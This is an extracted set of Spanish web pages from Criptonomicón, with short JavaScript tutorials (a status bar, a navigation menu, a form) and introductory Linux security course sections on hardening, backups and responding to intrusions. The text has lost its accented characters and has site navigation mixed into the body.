especificadado en defaultStatus.

Aadir JavaScript a una


pgina

Abrir y cerrar ventanas


Escribir en la ventana
actual

Validar formularios
Cambiar imgenes
dinmicamente

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

En ambos casos debe devolverse true si se desea establecer la


propiedad defaultStatus o status en los gestores de eventos
onMouseOut u onMouseOver.
La propiedad defaultStatus suele establecerse al cargar la pgina,
utilizando el evento onLoad en la etiqueta <BODY>, que se
produce cuando comienza a cargarse el documento. Por otro lado,
la propiedad status se suele establecer en los enlaces, utilizando el
evento onMouseOver.

Clculos matemticos

Cookies

La barra de estado

Men de navegacin

Como ejemplo, puede comprobarse en esta misma pgina cmo al deslizar el ratn
sobre los enlaces del recuadro colorado de la derecha, cambian los mensajes que
aparecen en la barra de estado.

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/barraestado.html (1 of 2) [25/10/2000 02:33:45 p.m.]

Cmo escribir mensajes en la barra de estado


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/barraestado.html (2 of 2) [25/10/2000 02:33:45 p.m.]

Men de navegacin

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Men de navegacin
Una aplicacin que puede resultar muy til es construir una ayuda
a la navegacin utilizando para ello un men desplegable donde se
encuentran las opciones a las que se puede acudir.
En un sitio web muy grande o cuando hay que elegir en una lista
interminable de artculos, el men desplegable puede suponer la
forma ms cmoda y elegante de acometer la tarea de ofrecer una
navegacin clara e intuitiva.
Para realizarla se utiliza el objeto SELECT y el evento onChange,
de la siguiente manera:
<select onChange="location.href =
this.options[this.selectedIndex].value"
size = "1" name = "navegador">
<option value = ".">Elige pgina</option>
<option value =
"calculadora.html">calculadora</option>
<option value =
"javascript.html">javascript</option>
</select>

A continuacin se muestra el resultado de utilizar el cdigo


anterior:

Aadir JavaScript a una


pgina

Abrir y cerrar ventanas


Escribir en la ventana
actual

Validar formularios
Cambiar imgenes
dinmicamente

Clculos matemticos

Cookies

La barra de estado

Men de navegacin

Quiero ir a:

Spam

Remailers

Anonimato

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Correo seguro

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/navegador.html (1 of 2) [25/10/2000 02:33:46 p.m.]

Men de navegacin
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/navegador.html (2 of 2) [25/10/2000 02:33:46 p.m.]

Ejemplo de formulario con control de entrada

Suscripcin gratis

Intimidad?

Artculos

Ejemplo de formulario

Seguridad

Introduzca sus datos personales:


Nombre

Linux

Edad
Navegacin segura

Direccin de correo
Control de acceso

Aadir JavaScript a una


pgina

Abrir y cerrar ventanas


Escribir en la ventana
actual

Validar formularios
Cambiar imgenes

Enviar datos

dinmicamente

CGI
Clculos matemticos
Java
Cookies
JavaScript

La barra de estado

Cookies

Crashes
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros

Spam

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/ejform.html (1 of 2) [25/10/2000 02:33:46 p.m.]

Ejemplo de formulario con control de entrada


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/javascript/ejform.html (2 of 2) [25/10/2000 02:33:46 p.m.]

Seguridad en Linux - Introduccin

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Por qu es necesaria la seguridad


Ante todo Linux es un sistema multiusuario real. Puede haber
varios usuarios distintos trabajando a la vez cada uno desde su
terminal. El sistema tiene la obligacin de proteger a unos
usuarios frente a otros y protegerse a s mismo.

Qu significa Seguro?

Linux es una excelente estacin de trabajo aislada, pero lo


habitual es que cada mquina linux est conectada a una red y
adems est prestando servicios de red. El sistema tiene la
obligacin de garantizar los servicios que presta.

Servicios en Linux

Seguridad del Root


Preparacin para la
Seguridad

Por qu la Seguridad

Seguridad en el
desarrollo de Linux

Qu Quiere Proteger?

Qu hacer en caso de
Ruptura?

Recursos

Adems, con la generalizacin de las conexiones con Internet y el


rpido desarrollo del software, la seguridad se est convirtiendo en una cuestin cada
vez ms importante. Ahora, la seguridad es un requisito bsico, ya que la red global
es insegura por definicin. Mientras sus datos estn almacenados en un soporte
informtico, mientras sus datos vayan desde un sistema X a otro sistema Y a travs
de un medio fsico, Internet, por ejemplo, puede pasar por ciertos puntos durante el
camino proporcionando a otros usuarios la posibilidad de interceptarlos, e incluso
alterar la informacin contenida. Incluso algn usuario de su sistema puede modificar
datos de forma maliciosa para hacer algo que nos pueda resultar perjudicial. Con el
acceso masivo y barato a Internet se han reducido notablemente los costes de un
atacante para asaltar un sistema en red, a la vez que ha aumentado paralelamente el
nmero de potenciales atacantes. Resumiendo, a nadie le gustara que desconocidos
abran su correo privado, que miren en sus cajones, que se hagan copias de las llaves
de su escritorio o de la tarjeta de crdito. Pues todo esto es aplicable en la misma
medida a las redes telemticas.
Tambin queremos remarcar el carcter dinmico de la seguridad de los sistemas en
red. Continuamente aparecen nuevos mtodos para conseguir accesos indebidos o
comprometer el correcto funcionamiento de la red. Esto obliga a estar actualizado
permanentemente, y consultar las publicaciones electrnicas que informan de los
ltimos sucesos detectados. Evidentemente, estas publicaciones informan

file:///C|/TEMP/criptonomicon/criptonomicon/linux/intro.html (1 of 2) [25/10/2000 02:34:23 p.m.]

Seguridad en Linux - Introduccin

principalmente sobre actividades que ya se han llevado a cabo, por lo que esperamos
que no sea el primero en sufrirlas. Pero tambin se puede encontrar informacin
sobre debilidades detectadas antes de que se lleven a cabo. Por todo esto, este curso
no pretende proporcionar una lista actualizada de programas o servicios
potencialmente inseguros o de programas que afectan a la seguridad (denominados
exploits). Como continuamente aparecen nuevos programas para comprometer la
seguridad de las redes y de las comunicaciones, lo que s haremos ser indicar los
lugares ms habituales donde buscar una informacin actualizada de ese tipo, y
algunos mtodos generales para prevenir que esos programas tengan xito en su
sistema.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/intro.html (2 of 2) [25/10/2000 02:34:23 p.m.]

Seguridad fsica - Introduccin

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Seguridad fsica
Las primeras medidas de seguridad que necesita tener en cuenta
son las de seguridad fsica de sus sistemas. Hay que tomar en
consideracin quines tienen acceso fsico a las mquinas y si
realmente deberan acceder.

Seguridad fsica
Seguridad en el
arranque
Bloqueo de la consola

El nivel de seguridad fsica que necesita en su sistema depende de


su situacin concreta. Un usuario domstico no necesita preocuparse demasiado por
la proteccin fsica, salvo proteger su mquina de un nio o algo as. En una oficina
puede ser diferente.
Linux proporciona los niveles exigibles de seguridad fsica para un sistema
operativo:
Un arranque seguro
Posibilidad de bloquear las terminales
Por supuesto, las capacidades de un sistema multiusuario real.

Recursos

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/segfisica.html [25/10/2000 02:34:23 p.m.]

Seguridad local - Introduccin

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de

Introduccin
Linux es un sistema operativo multiusuario real: puede haber
varios usuarios trabajando simultneamente con l, cada uno en su
terminal. Esto obliga a tener en cuenta medidas de seguridad
adicionales. Adems, segn hablan las estadsticas, el mayor
porcentaje de violaciones de un sistema son realizadas por
usuarios locales. Pero no slo hay que protegerse de las
violaciones intencionadas, sino que el sistema debe protegernos de
operaciones accidentales debidas a decuidos o ignorancia de los
usuarios.

Introduccin
Cuentas de usuario,
grupos
Seguridad de las claves
El bit SUID/SGID
Seguridad del root

En este aspecto de la seguridad, Linux dispone de todas las caractersticas de los


sistemas Unix: un control de acceso a los usuarios verificando una pareja de usuario
y clave; cada fichero y directorio tienen sus propietario y permisos.

Ruptura?

Recursos

Por otro lado, la meta de la mayora de los ataques es conseguir acceso como root, lo
que garantiza un control total sobre el sistema. Primero se intentar conseguir acceso
como usuario "normal" para posteriormente ir incrementando sus niveles de
privilegio utilizando las posibles debilidades del sistema: programas con errores,
configuraciones deficientes de los servicios o el descifrado de claves cifradas.
Incluso se utilizan tcnicas denominadas "ingeniera social", consistentes en
convencer a ciertos usuarios para que suministren una informacin que debiera ser
mantenida en secreto, como sus nombres de usuario y contraseas.
En este apartado de seguridad local pretendemos dar unas ideas generales de los
riesgos existentes, mecanismos para su solucin y unas directrices de actuacin que
deberan convertirse en hbitos cotidianos.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/seglocal.html [25/10/2000 02:34:24 p.m.]

Seguridad del Sistema de Archivos - Introduccin

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Introduccin
Una norma bsica de seguridad radica en la asignacin a cada
usuario slo de los permisos necesarios para poder cubrir las
necesidades de su trabajo sin poner en riesgo el trabajo de los
dems.
Como se puede poner en riesgo el correcto funcionamiento
del sistema?
Podemos apuntar algunas ideas: violando la privacidad de la
informacin, obteniendo unos privilegios que no le correspoden a
un usuario, haciendo un uso desmedido de los recursos o
modificando informacin legtima contenida en una mquina,
como pueden ser el contenido de una pgina web o una base de
datos.

Introduccin
El rbol de directorios
Permisos
Enlaces
Tripwire
Limitar el espacio
Normas prcticas

Cmo podemos mantener un almacenamiento seguro?


La respuesta no puede ser concreta, pero s que se pueden tomar ciertas medidas que
garanticen un mnimo de seguridad y funcionalidad. Si Vd. va a administrar un
sistema Linux para dar servicio a diversos usuarios, debera tener algunas nociones
sobre sistemas de ficheros, que pasamos a explicar a continuacin.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/introsegfich.html [25/10/2000 02:34:25 p.m.]

Seguridad del ncleo - Introduccin

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Introduccin
Linux tiene la gran ventaja de tener disponible el cdigo fuente
del ncleo; en realidad Linux propiamente dicho es slo el ncleo.
Esto nos permite la posibilidad de crear ncleos a medida de
nuestras necesidades. Y parte de nuestras necesidades ser la
mejora de la seguridad.

Introduccin
Opciones de
compilacin
Dispositivos del ncleo

Para compilar el ncleo primero tendremos que configurar las opciones que nos
interesen. Los fuentes del ncleo se guardan habitualmente en el directorio
/usr/src/linux, y una vez situados en l, tendremos que ejecutar make menuconfig
(o make xconfig si estamos en modo grfico). As nos aparecen todas las opciones
de configuracin. Dentro de ellas nos vamos a fijar en las que estn relacionadas con
la seguridad, viendo una breve explicacin de lo que hacen y cmo se usan.
Como el ncleo controla las caractersticas de red de su sistema, es importante que el
ncleo tenga las opciones que garanticen la seguridad y que el propio ncleo no
pueda ser comprometido. Para prevenir algunos de los ltimos ataques de red, debe
intentar mantener una versin del ncleo actualizada. Puede encontrar las nuevas
versiones del ncleo en The Linux Kernel Archives.
Una de las caractersticas ms interesantes del ncleo Linux es la posibilidad de
realizar enmascaramiento de direcciones. Con esta tcnica podremos dar acceso a
Internet a una red local con direcciones privadas de forma transparente, es decir, sin
ningn tipo de modificacin en la configuracin de las aplicaciones clientes, a
diferencia de los proxies clsicos. Consiste en que el sistema Linux que posee la
conexin hacia el exterior recibe las peticiones de conexin desde los equipos de la
red local que tienen direcciones no vlidas para Internet. El equipo Linux rehace la
peticin poniendo su propia direccin IP y modificando el puerto al que tiene que
responder el equipo remoto. Cuando Linux recibe la respuesta del equipo remoto,
mira el puerto al que va destinado y vuelve a rehacer el paquete para enviarlo al
equipo concreto de la red local que solicit la conexin. De esta forma podemos
mantener un nivel aceptable de proteccin para los equipos de la red local, ya que
slo podrn recibir respuestas a peticiones que ellos mismos originaron.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre

file:///C|/TEMP/criptonomicon/criptonomicon/linux/introsegnucleo.html (1 of 2) [25/10/2000 02:34:25 p.m.]

Seguridad del ncleo - Introduccin


privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/introsegnucleo.html (2 of 2) [25/10/2000 02:34:25 p.m.]

Seguridad de Red - Introduccin

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root

Introduccin
La seguridad de las conexiones en red merecen en la actualidad
una atencin especial, incluso por medios de comunicacin no
especializados, por el impacto que representan los fallos ante la
opinin pblica.
El propio desarrollo tanto de Linux, como de la mayora del
software que lo acompaa, es de fuentes abiertas. Podemos ver y
estudiar el cdigo. Esto tiene la ventaja de que la seguridad en
Linux no sea una mera apariencia, sino que el cdigo est siendo
escrutado por muchas personas distintas que rpidamente detectan
los fallos y los corrigen con una velocidad asombrosa.

Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Consejos finales

Preparacin para la
Seguridad
Qu hacer en caso de

Si adems comprendemos los mecanismos que se siguen en las


conexiones en red, y mantenemos actualizados nuestros programas, podemos tener
un nivel de seguridad y una funcionalidad aceptables.

Ruptura?

Recursos

Tampoco tienen las mismas necesidades de seguridad un equipo domstico, con


conexiones espordicas a Internet, que un servidor conectado permanentemente y
que acte como pasarela entre una intranet e Internet.
Para describir las pautas de actuacin seguras iremos examinando cmo actan las
conexiones y cmo podemos protegerlas.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/introsegred.html [25/10/2000 02:34:26 p.m.]

Seguridad del root - Introduccin

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Introduccin
Introduccin
A menudo, el mayor enemigo del sistema es el propio
administrador del sistema, s, tiene todos los privilegios y
Hbitos seguros
cualquier accin puede ser irreversible y hacerle perder
posteriormente mucho ms tiempo que el que hubiera perdido por
Consejos
realizar las tareas de forma segura. Puede borrar cualquier fichero
e incluso destruir el propio sistema, mientras que un usuario normal slo puede
perjudicarse a s mismo. Por estos motivos, conseguir privilegios de root es la meta
de cualquier ataque.

Tampoco hay que alarmarse. Piense que en un sistema operativo monousuario


cualquiera podra darle formato al disco duro y perder toda la informacin
almacenada o borrar cuaquier fichero necesario para el funcionamiento del sistema.
En un sistema estilo Unix, como Linux, esto slo lo podra hacer el usuario root.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/introsegroot.html [25/10/2000 02:34:26 p.m.]

Preparacin para la Seguridad

Introduccin

Seguridad Fsica

Seguridad Local

La seguridad es un proceso continuo, que requiere tener previsto hasta lo


imprevisible. Tener unos buenos hbitos y tomar unas pequeas precauciones nos
ayudarn mucho.

Seguridad del Sistema de


Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Determinar los servicios activos


Desactive todos los servicios que no vaya a prestar, en particular revise los ficheros
/etc/inittab, /etc/inetd.conf y los demonios que se lanzan durante el arranque. Si no
est realmente seguro de lo que hace, mejor no haga nada; las distribuciones ms
modernas incorporan unos mnimos de seguridad aceptables para un usuario medio.
No tiene sentido tener abierto un servicio del que no va a hacer uso ningn usuario
legal. Puede que est consumiendo recursos de su sistema para ofrecer a algn
atacante la posibilidad de violarlo.
Puede usar un analizador de puertos para ver qu parte de su sistema es visible desde
el exterior. Existen utilidades como SATAN, Nessus o nmap que realizan esta labor.
Trinux es una minidistribucin de Linux totalmente portable que se puede llevar en
2 3 disquetes y se ejecuta por completo en RAM, puedindose usar desde cualquier
equipo para la red. Se arranca desde el disquete y no utiliza el disco duro para nada.
Contiene las ltimas versiones de algunas herramientas muy prcticas enfocadas a la
seguridad en redes. Nos permitir analizar el trfico de la red, analizar puertos e
incluso ver el contenido de los paquetes que circulan por la red.

Proteger los ficheros importantes


Existe un parche para el ncleo Linux que impide que ciertos ficheros puedan ser
modificados, incluso por el propio root. El ncleo parcheado de esta forma puede
garantizarnos la integridad de la informacin almacenada incluso en el caso de que
alguien consiguiera privilegios de root en nuestro sistema. Este parche se puede
obtener, junto con la informacin necesaria para su instalacin, en LIDS.
Si no queremos aplicar el parche, s que deberamos vigilar los permisos de ficheros
y directorios.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/introprepseg.html (1 of 4) [25/10/2000 02:34:27 p.m.]

Preparacin para la Seguridad

Software actualizado
La gran mayora del sofware que acompaa a Linux es de cdigo fuente pblico,
como el propio ncleo. Esto es una garanta de seguridad en s. Cientos de expertos
analizan minuciosamente el cdigo para detectar alguna pega que poder publicar en
las listas de correo sobre seguridad ms prestigiosas, y se corrigen con gran rapidez.
De esta forma nos garantizamos un software de calidad y no una mera seguridad
aparente. Esto por otro lado nos obliga a ir sustituyendo las versiones defectuosas por
otras corregidas y que mejoran las prestaciones. En cualquier sistema operativo,
mantener un software que ha demostrado tener fallos supone asumir un riesgo
innecesario.
Para estar actualizado consulte los recursos de informacin sobre seguridad en Linux.

Prevenir prdidas de informacin


Existen acontecimientos de los que nos puede resultar muy difcil protegernos como
son los desastres naturales, nicamente podremos seguir una serie de pasos para
evitar que su incidencia sea lo menor posible. La mejor solucin es mantener un buen
conjunto de copias de seguridad sobre toda la informacin necesaria del sistema. Hay
que pensar que las copias de seguridad no slo nos protegen de desastres naturales,
tambin de los desastres que pueda ocasionar algn intruso en nuestro sistema, de
cualquier ataque a la disponibilidad o integridad de la informacin del sistema.
Si los datos tienen un tamao inferior a 650Mb, puede ser una buena opcin
grabarlos en un CD, bien permanente (ya que es ms difcil de falsificar con
posterioridad, y si estn almacenados de forma adecuada pueden durar mucho
tiempo) o regrabable. Las cintas y otros medios sobre los que se puede escribir
deberan protegerse tan pronto como se completa la copia y se verifica para evitar la
falsificacin. Tenga cuidado y almacene su copia de seguridad en un sitio seguro.
Una buena copia de seguridad le asegura que tiene un buen punto desde el que
restaurar su sistema.
Hay que insistir en la seguridad de las copias de seguridad. Si las copias de seguridad
no estn almacenadas en un sitio seguro, puede que el posible intruso no tenga
necesidad de idear mtodos sofisticados para obtenerla, si le basta con copiar o
sustraer un CD.

Caractersticas de las copias de seguridad


Cuando se realice una copia de seguridad es conveniente seleccionar un mtodo que
garantice la conservacin de las caractersticas de la informacin como son derechos
y permisos. Si realizamos una copia de seguridad de una forma o sobre un soporte
que no contemple esta posibilidad, si tenemos que restaurar los datos sobre el sistema
el resultado sobre la seguridad y funcionalidad globales puede ser impredecible.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/introprepseg.html (2 of 4) [25/10/2000 02:34:27 p.m.]

Preparacin para la Seguridad

Secuencia de Copias
Es necesario tener un poltica de copias de seguridad adecuada a las caractersticas de
la entidad que estamos gestionando. Quizs el mejor mtodo es el de rotacin de
cintas. Pasamos a verlo con un ejemplo.
Un ciclo de seis cintas es fcil de mantener. Esto incluye cuatro cintas para la
semana, una cinta para cada Viernes y una cinta para para los Viernes impares. Se
realiza una copia incremental cada da, y una copia completa en la cinta adecuada de
cada Viernes. Si hace algn cambio importante o aade datos importantes a su
sistema tambin sera adecuado efectuar una copia.

Copiar las Bases de Datos del Sistema


Existe cierta informacin del sistema que es imprescindible para su correcto
funcionamiento. Es conveniente tener una copia de estos ficheros en una ubicacin
segura. En particular resulta conveniente tener una copia del contenido del directorio
/etc. Tambin hay que mantenerla en lugar seguro, ya que tiene copias de los ficheros
/etc/passwd y /etc/shadows, entre otros que puedan contener claves de usuarios que
no estn cifradas.
Tambin en cada sistema se puede tener una base de datos de las aplicaciones que
hay instaladas en el servidor. Cada distribucin dispone de alguna herramienta que
nos realiza el mantenimiento de la base de datos a la mism vez que instala o
desinstala aplicaciones. La prdida de esta base de datos nos hara perder el control
sobre qu aplicaciones tenemos instaladas.
En muchas situaciones tambin ser necesario tener copia de seguridad de los
ficheros de registro de incidencias, para tener constancia de las distintas actividades
del sistema.

Consejos

Suscribirse a las listas de correo de alertas de seguridad para estar actualizado.


Prestar atencin a los ficheros de registro.
Actualizar el software inseguro.
Verificar regularmente la integridad de los ficheros con algn software como
tripwire.
Tener unas copias de seguridad adecuadas.
Utilizar PGP o GnuPG para garantizar la autenticidad y la privacidad.
Verificar con periodicidad los puertos de los equipos.
Revisar peridicamente las cuentas de usuario.
Asignar cuotas de uso de recursos del sistema.
Mantener los terminales seguros.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/introprepseg.html (3 of 4) [25/10/2000 02:34:27 p.m.]

Preparacin para la Seguridad

Asegurarse de tener claves slidas.


Mantener el sistema de ficheros con propietarios y permisos adecuados.
Instalar cortafuegos.

En resumen
Ahora, una vez vistas las caractersticas generales de seguridad, lo que queda es
aplicar el sentido comn. Tenemos que ver nuestra situacin y respondernos a una
serie de preguntas:
Qu queremos proteger?
Qu valor tiene lo que queremos proteger?
Qu coste tiene la seguridad?
De quin nos queremos proteger?
Cules son los puntos dbiles de nuestro sistema?
Las posibles respuestas a estas preguntas nos propocionan un abanico de
posibilidades demasiado amplio como para poderlo tratar todo.
Lo primero que tenemos que determinar es lo que queremos proteger. No ser lo
mismo una estacin de trabajo personal aislada con conexiones a Internet espordicas
que un servidor web con conexin permanente o un cortafuegos.
Tambin tendremos que considerar el coste de lo que queremos proteger: posible
coste econmico, tiempo de restauracin o instalacin, prestigio, perdida de clientes,
etc. Tambin el coste de la seguridad en unos trminos parecidos a los anteriores.
Sera absurdo que invirtiramos ms en proteccin que el coste de lo protegido.
Tambin hay que considerar que existe una relacin inversa entre seguridad y
funcionalidad. Cuanto ms seguro hacemos un sistema, menos funcional resulta,
ofreciendo menos servicios y ms limitaciones de acceso. Esto tambin constituye
otro coste adicional: facilidad de uso.
Despus de saber qu y de qu tenemos que protegernos, de quines y cules son sus
posibles objetivos, y viendo los servicios que necesariamente hay que prestar o usar,
obtendremos un esquema elemental de nuestra situacin y de las medidas que
tenemos que tomar.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/introprepseg.html (4 of 4) [25/10/2000 02:34:27 p.m.]

Qu hacer en caso de Ruptura?

Introduccin

Seguridad Fsica

Ahora vamos a ver qu se puede hacer en caso de haber sufrido o estar sufriendo un
ataque.

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

No es una situacin agradable, y aunque siempre sera preferible que no hubiera


sucedido, conviene tener en mente una serie de normas que nos permitan una
actuacin rpida y certera que disminuya las consecuencias del incidente. Como
norma general hay que conservar la calma. No conviene tomar medidas apresuradas
que puedan aumentar el impacto del ataque.
Vamos a distinguir una serie de situaciones posibles y cmo se debe actuar. Una vez
visto esto nos queda aplicar el sentido comn.

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Deteccin de un ataque activo


Nos ponemos en situacin: acabamos de detectar un ataque que est actualmente en
curso.
El ataque puede ser de diversa naturaleza. Dejaremos aparte los casos genricos
como detectar alguien manipulando fsicamente el ordenador.

Ataque local
Cuando detectamos un ataque local tendremos que verificar la identidad del atacante.
No conviene sacar conclusiones precipitadas y culpar a alguien de atacar el sistema
cuando slo puede que sea una negligencia a la hora de seleccionar una clave o
abandonar abierta una consola.
Hay que verificar el origen de la conexin, los registros del sistema y los procesos
que tiene activos. Tendremos que comprobar si son los habituales y qu es lo que se
sale de lo normal. Despus nos dirigiremos a esa persona, por telfono o
personalmente, para preguntar qu est haciendo y pedir que cese en la actividad. Si
no tiene una conexin activa y no tiene idea de lo que le estamos diciendo, habr que
profundizar en la investigacin porque cabe la posibilidad de que alguien haya
utilizado esa cuenta de forma ilegtima. Si reconoce el incidente, que le informe de
los mecanismos que ha utilizado, las acciones que ha realizado y acte en
consecuencia.
Nunca se precipite para hacer acusaciones. Recopile todas las pruebas que haya
file:///C|/TEMP/criptonomicon/criptonomicon/linux/ruptura.html (1 of 4) [25/10/2000 02:34:28 p.m.]

Qu hacer en caso de Ruptura?

detectado en los registros, procesos, modificaciones de informacin, etc. Sea rpido,


pero seguro. Est en juego su sistema y su prestigio.

Ataque en red
Si el ataque se produce a travs de la red podemos tener distintas situaciones. En
general puede ser conveniente espiar un poco al intruso para obtener ms pruebas y
despus desconectar el interfaz de red si es posible. Si no fuera posible desconectar el
interfaz, deberamos usar algn filtro para las conexiones procedentes de la direccin
del atacante. Programas como ipchains (o ipfwadm en su caso) pueden realizar esta
labor. Si desconectamos el interfaz o denegamos (no rechazar) los paquetes
procedentes de esa direccin el intruso lo podra interpretar como un error de red,
ms que una deteccin del ataque. Si no se pudiera limitar el acceso a las direcciones
que usa el intruso, intente cerrar la cuenta del usuario. Observe que cerrar una cuenta
no es una cosa simple. Tiene que tener en cuenta los ficheros .rhosts, el acceso FTP y
otras posibles puertas traseras.
En general no es aconsejable apagar el sistema. Por supuesto, nunca apagarlo en
caliente; esto podra hacernos perder la informacin que tenemos en memoria. En
Linux podemos ver la lista de procesos que hay en ejecucin y matar aquellos que
puedan estar daando al sistema.
Somos el destino del ataque o somos un punto intermedio?
Se puede dar la situacin que nuestra mquina no sea el destino final del ataque.
Puede que el intruso la haya utilizado como punto intermedio para atacar a otros
sistemas e intentar dificultar el seguimiento de las pistas. En este caso, adems de
limitar las acciones del atacante deberamos notificarlo al administrador del destino
del ataque y conservar todas las pruebas existentes por si se pudieran reclamar
judicialmente.
En cualquier caso, si queremos dar validez legal a las pruebas obtenidas, sera
conveniente la intervencin judicial.
